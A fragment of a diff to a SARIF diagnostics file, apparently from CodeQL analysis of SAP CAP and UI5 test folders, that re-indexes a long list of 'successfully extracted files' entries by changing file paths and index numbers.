"uriBaseId" : "%SRCROOT%", - "index" : 17 + "index" : 12 } } } ], @@ -3426,7 +3402,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3438,9 +3414,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "codeql-workspace.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 18 + "index" : 13 } } } ], @@ -3452,7 +3428,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3464,9 +3440,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 19 + "index" : 14 } } } ], @@ -3478,7 +3454,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3490,9 +3466,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 20 + "index" : 15 } } } ], @@ -3504,7 +3480,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3516,9 +3492,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 21 + "index" : 16 } } } ], @@ -3530,7 +3506,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3542,9 +3518,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 22 + "index" : 17 } } } ], @@ -3556,7 +3532,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3568,9 +3544,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 23 + "index" : 18 } } } ], @@ -3582,7 +3558,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3594,9 +3570,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 24 + "index" : 19 } } } ], @@ -3608,7 +3584,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3620,9 +3596,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 25 + "index" : 20 } } } ], @@ -3634,7 +3610,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3646,9 +3622,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 26 + "index" : 21 } } } ], @@ -3660,7 +3636,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3672,9 +3648,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 27 + "index" : 22 } } } ], @@ -3686,7 +3662,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3698,9 +3674,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 28 + "index" : 23 } } } ], @@ -3712,7 +3688,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3724,9 +3700,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 29 + "index" : 24 } } } ], @@ -3738,7 +3714,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3750,9 +3726,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 30 + "index" : 25 } } } ], @@ -3764,7 +3740,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3776,9 +3752,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 31 + "index" : 26 } } } ], @@ -3790,7 +3766,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3802,9 +3778,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 32 + "index" : 27 } } } ], @@ -3816,7 +3792,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3828,9 +3804,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 33 + "index" : 28 } } } ], @@ -3842,7 +3818,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3854,9 +3830,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 34 + "index" : 29 } } } ], @@ -3868,7 +3844,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3880,9 +3856,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 35 + "index" : 30 } } } ], @@ -3894,7 +3870,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3906,9 +3882,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 36 + "index" : 31 } } } ], @@ -3920,7 +3896,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3932,9 +3908,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 37 + "index" : 32 } } } ], @@ -3946,7 +3922,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3958,9 +3934,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 38 + "index" : 33 } } } ], @@ -3972,7 +3948,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -3984,9 +3960,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 39 + "index" : 34 } } } ], @@ -3998,7 +3974,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4010,9 +3986,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 40 + "index" : 35 } } } ], @@ -4024,7 +4000,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4036,9 +4012,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 41 + "index" : 36 } } } ], @@ -4050,7 +4026,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4062,9 +4038,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 42 + "index" : 37 } } } ], @@ -4076,7 +4052,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4088,9 +4064,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 43 + "index" : 38 } } } ], @@ -4102,7 +4078,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4114,9 +4090,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 44 + "index" : 39 } } } ], @@ -4128,7 +4104,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4140,9 +4116,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 45 + "index" : 40 } } } ], @@ -4154,7 +4130,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4166,9 +4142,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 46 + "index" : 41 } } } ], @@ -4180,7 +4156,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4192,9 +4168,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 47 + "index" : 42 } } } ], @@ -4206,7 +4182,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4218,9 +4194,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 48 + "index" : 43 } } } ], @@ -4232,7 +4208,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4244,9 +4220,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 49 + "index" : 44 } } } ], @@ -4258,7 +4234,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4270,9 +4246,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 50 + "index" : 45 } } } ], @@ -4284,7 +4260,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4296,9 +4272,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 51 + "index" : 46 } } } ], @@ -4310,7 +4286,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4322,9 +4298,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 52 + "index" : 47 } } } ], @@ -4336,7 +4312,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4348,9 +4324,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 53 + "index" : 48 } } } ], @@ -4362,7 +4338,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4374,9 +4350,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 54 + "index" : 49 } } } ], @@ -4388,7 +4364,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4400,9 +4376,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 55 + "index" : 50 } } } ], @@ -4414,7 +4390,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4426,9 +4402,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", "uriBaseId" : "%SRCROOT%", - "index" : 56 + "index" : 51 } } } ], @@ -4440,7 +4416,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4452,9 +4428,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", - "index" : 57 + "index" : 52 } } } ], @@ -4466,7 +4442,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4478,9 +4454,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 58 + "index" : 53 } } } ], @@ -4492,7 +4468,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4504,9 +4480,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", "uriBaseId" : "%SRCROOT%", - "index" : 59 + "index" : 54 } } } ], @@ -4518,7 +4494,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4530,9 +4506,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", "uriBaseId" : "%SRCROOT%", - "index" : 60 + "index" : 55 } } } ], @@ -4544,7 +4520,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4556,9 +4532,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 61 + "index" : 56 } } } ], @@ -4570,7 +4546,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4582,9 +4558,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 62 + "index" : 57 } } } ], @@ -4596,7 +4572,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4608,9 +4584,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 63 + "index" : 58 } } } ], @@ -4622,7 +4598,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4634,9 +4610,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 64 + "index" : 59 } } } ], @@ -4648,7 +4624,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4660,9 +4636,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", "uriBaseId" : "%SRCROOT%", - "index" : 65 + "index" : 60 } } } ], @@ -4674,7 +4650,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4686,9 +4662,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 66 + "index" : 61 } } } ], @@ -4700,7 +4676,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4712,9 +4688,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", "uriBaseId" : "%SRCROOT%", - "index" : 67 + "index" : 62 } } } ], @@ -4726,7 +4702,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4738,9 +4714,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", "uriBaseId" : "%SRCROOT%", - "index" : 68 + "index" : 63 } } } ], @@ -4752,7 +4728,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4764,9 +4740,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", "uriBaseId" : "%SRCROOT%", - "index" : 69 + "index" : 64 } } } ], @@ -4778,7 +4754,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4790,9 +4766,9 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", "uriBaseId" : "%SRCROOT%", - "index" : 70 + "index" : 65 } } } ], @@ -4804,7 +4780,7 @@ "id" : "js/diagnostics/successfully-extracted-files", "index" : 1, "toolComponent" : { - "index" : 3 + "index" : 0 } }, "properties" : { @@ -4816,9 +4792,9 @@ 